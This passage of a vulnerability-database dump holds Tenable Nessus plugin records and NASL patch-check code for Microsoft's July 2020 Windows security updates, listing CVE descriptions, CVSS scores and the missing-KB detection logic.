:\n\n - A remote code execution vulnerability exists in the way\n that DirectWrite handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit an untrusted webpage. The security update\n addresses the vulnerability by correcting how\n DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists when the\n Windows Profile Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted fonts. For all systems except Windows 10, an\n attacker who successfully exploited the vulnerability\n could execute code remotely. For systems running Windows\n 10, an attacker who successfully exploited the\n vulnerability could execute code in an AppContainer\n sandbox context with limited privileges and\n capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. There are multiple ways an\n attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the\n Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Location Awareness Service\n handles objects in memory. An attacker who successfully\n exploited the vulnerability could allow an application\n with limited privileges on an affected system to execute\n code at a medium integrity level. (CVE-2020-1437)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists when\n Windows Address Book (WAB) improperly processes vcard\n files. (CVE-2020-1410)\n\n - An information disclosure vulnerability exists when the\n Windows Graphics component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An authenticated attacker\n could exploit this vulnerability by running a specially\n crafted application. The update addresses the\n vulnerability by correcting how the Windows Graphics\n Component handles objects in memory. (CVE-2020-1351)\n\n - An elevation of privilege vulnerability exists when\n Group Policy Services Policy Processing improperly\n handle reparse points. An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the\n Windows Modules Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - An information disclosure vulnerability exists when\n Skype for Business is accessed via Internet Explorer. An\n attacker who exploited the vulnerability could cause the\n user to place a call without additional consent, leading\n to information disclosure of the user profile. For the\n vulnerability to be exploited, a user must click a\n specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-1402)\n\n - A remote code execution vulnerability exists in .NET\n Framework, Microsoft SharePoint, and Visual Studio when\n the software fails to check the source markup of XML\n file input. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the process responsible for deserialization of the XML\n content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the\n Windows Cryptography Next Generation (CNG) Key Isolation\n service improperly handles memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1359,\n CVE-2020-1384)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1373, CVE-2020-1390,\n CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Function Discovery Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1085)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1412)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1389,\n CVE-2020-1419)\n\n - This security update corrects a denial of service in the\n Local Security Authority Subsystem Service (LSASS)\n caused when an authenticated attacker sends a specially\n crafted authentication request. A remote attacker who\n successfully exploited this vulnerability could cause a\n denial of service on the target system's LSASS service,\n which triggers an automatic reboot of the system. The\n security update addresses the vulnerability by changing\n the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1435)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1421)\");\n # https://support.microsoft.com/en-us/help/4565539/windows-7-update-kb4565539\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f84b756f\");\n # https://support.microsoft.com/en-us/help/4565524/windows-7-update-kb4565524\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d3552b4f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4565539 or Cumulative Update KB4565524.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1435\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-07';\nkbs = make_list(\n '4565524',\n '4565539'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'07_2020',\n bulletin:bulletin,\n rollup_kb_list:[4565524, 4565539])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:17:21", "description": "The remote Windows host is missing security update 4565535 or cumulative update 4565537. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that DirectWrite handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage. The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Credential Picker handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1385)\n\n - An elevation of privilege vulnerability exists when the Windows Profile Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted fonts. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists in the way that the Credential Enrollment Manager service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1368)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Location Awareness Service handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1437)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists when Windows Address Book (WAB) improperly processes vcard files. (CVE-2020-1410)\n\n - An information disclosure vulnerability exists when the Windows Graphics component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Graphics Component handles objects in memory. (CVE-2020-1351)\n\n - An elevation of privilege vulnerability exists when Group Policy Services Policy Processing improperly handle reparse points. An attacker who successfully exploited this vulnerability could overwrite a targeted file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the Windows Modules Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - An information disclosure vulnerability exists when Skype for Business is accessed via Internet Explorer. An attacker who exploited the vulnerability could cause the user to place a call without additional consent, leading to information disclosure of the user profile. For the vulnerability to be exploited, a user must click a specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-1402)\n\n - A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the Windows Cryptography Next Generation (CNG) Key Isolation service improperly handles memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1359, CVE-2020-1384)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1373, CVE-2020-1390, CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1085)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1412)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1389, CVE-2020-1419)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1249, CVE-2020-1399)\n\n - An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1356)\n\n - This security update corrects a denial of service in the Local Security Authority Subsystem Service (LSASS) caused when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause a denial of service on the target system's LSASS service, which triggers an automatic reboot of the system. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1435)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1421)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "KB4565535: Windows Server 2012 July 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1085", "CVE-2020-1147", "CVE-2020-1249", "CVE-2020-1267", "CVE-2020-1333", "CVE-2020-1346", "CVE-2020-1351", "CVE-2020-1354", "CVE-2020-1356", "CVE-2020-1359", "CVE-2020-1360", "CVE-2020-1365", "CVE-2020-1368", "CVE-2020-1371", "CVE-2020-1373", "CVE-2020-1374", "CVE-2020-1384", "CVE-2020-1385", "CVE-2020-1389", "CVE-2020-1390", "CVE-2020-1396", "CVE-2020-1397", "CVE-2020-1399", "CVE-2020-1400", "CVE-2020-1401", "CVE-2020-1402", "CVE-2020-1403", "CVE-2020-1407", "CVE-2020-1408", "CVE-2020-1409", "CVE-2020-1410", "CVE-2020-1412", "CVE-2020-1419", "CVE-2020-1421", "CVE-2020-1427", "CVE-2020-1428", "CVE-2020-1430", "CVE-2020-1432", "CVE-2020-1435", "CVE-2020-1436", "CVE-2020-1437", "CVE-2020-1438", "CVE-2020-1468"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JUL_4565537.NASL", "href": "https://www.tenable.com/plugins/nessus/138462", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138462);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-1085\",\n \"CVE-2020-1147\",\n \"CVE-2020-1249\",\n \"CVE-2020-1267\",\n \"CVE-2020-1333\",\n \"CVE-2020-1346\",\n \"CVE-2020-1351\",\n \"CVE-2020-1354\",\n \"CVE-2020-1356\",\n \"CVE-2020-1359\",\n \"CVE-2020-1360\",\n \"CVE-2020-1365\",\n \"CVE-2020-1368\",\n \"CVE-2020-1371\",\n \"CVE-2020-1373\",\n \"CVE-2020-1374\",\n \"CVE-2020-1384\",\n \"CVE-2020-1385\",\n \"CVE-2020-1389\",\n \"CVE-2020-1390\",\n \"CVE-2020-1396\",\n \"CVE-2020-1397\",\n \"CVE-2020-1399\",\n \"CVE-2020-1400\",\n \"CVE-2020-1401\",\n \"CVE-2020-1402\",\n \"CVE-2020-1403\",\n \"CVE-2020-1407\",\n \"CVE-2020-1408\",\n \"CVE-2020-1409\",\n \"CVE-2020-1410\",\n \"CVE-2020-1412\",\n \"CVE-2020-1419\",\n \"CVE-2020-1421\",\n \"CVE-2020-1427\",\n \"CVE-2020-1428\",\n \"CVE-2020-1430\",\n \"CVE-2020-1432\",\n \"CVE-2020-1435\",\n \"CVE-2020-1436\",\n \"CVE-2020-1437\",\n \"CVE-2020-1438\",\n \"CVE-2020-1468\"\n );\n script_xref(name:\"MSKB\", value:\"4565535\");\n script_xref(name:\"MSKB\", value:\"4565537\");\n script_xref(name:\"MSFT\", value:\"MS20-4565535\");\n script_xref(name:\"MSFT\", value:\"MS20-4565537\");\n script_xref(name:\"IAVA\", value:\"2020-A-0306-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0313-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4565535: Windows Server 2012 July 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4565535\nor cumulative update 4565537. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that DirectWrite handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit an untrusted webpage. The security update\n addresses the vulnerability by correcting how\n DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Credential Picker handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could allow an application with limited\n privileges on an affected system to execute code at a\n medium integrity level. (CVE-2020-1385)\n\n - An elevation of privilege vulnerability exists when the\n Windows Profile Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted fonts. For all systems except Windows 10, an\n attacker who successfully exploited the vulnerability\n could execute code remotely. For systems running Windows\n 10, an attacker who successfully exploited the\n vulnerability could execute code in an AppContainer\n sandbox context with limited privileges and\n capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. There are multiple ways an\n attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists in the\n way that the Credential Enrollment Manager service\n handles objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1368)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the\n Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Location Awareness Service\n handles objects in memory. An attacker who successfully\n exploited the vulnerability could allow an application\n with limited privileges on an affected system to execute\n code at a medium integrity level. (CVE-2020-1437)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists when\n Windows Address Book (WAB) improperly processes vcard\n files. (CVE-2020-1410)\n\n - An information disclosure vulnerability exists when the\n Windows Graphics component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An authenticated attacker\n could exploit this vulnerability by running a specially\n crafted application. The update addresses the\n vulnerability by correcting how the Windows Graphics\n Component handles objects in memory. (CVE-2020-1351)\n\n - An elevation of privilege vulnerability exists when\n Group Policy Services Policy Processing improperly\n handle reparse points. An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the\n Windows Modules Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - An information disclosure vulnerability exists when\n Skype for Business is accessed via Internet Explorer. An\n attacker who exploited the vulnerability could cause the\n user to place a call without additional consent, leading\n to information disclosure of the user profile. For the\n vulnerability to be exploited, a user must click a\n specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-1402)\n\n - A remote code execution vulnerability exists in .NET\n Framework, Microsoft SharePoint, and Visual Studio when\n the software fails to check the source markup of XML\n file input. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the process responsible for deserialization of the XML\n content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the\n Windows Cryptography Next Generation (CNG) Key Isolation\n service improperly handles memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1359,\n CVE-2020-1384)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1373, CVE-2020-1390,\n CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Function Discovery Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1085)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1412)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1389,\n CVE-2020-1419)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1249, CVE-2020-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows iSCSI Target Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1356)\n\n - This security update corrects a denial of service in the\n Local Security Authority Subsystem Service (LSASS)\n caused when an authenticated attacker sends a specially\n crafted authentication request. A remote attacker who\n successfully exploited this vulnerability could cause a\n denial of service on the target system's LSASS service,\n which triggers an automatic reboot of the system. The\n security update addresses the vulnerability by changing\n the way that 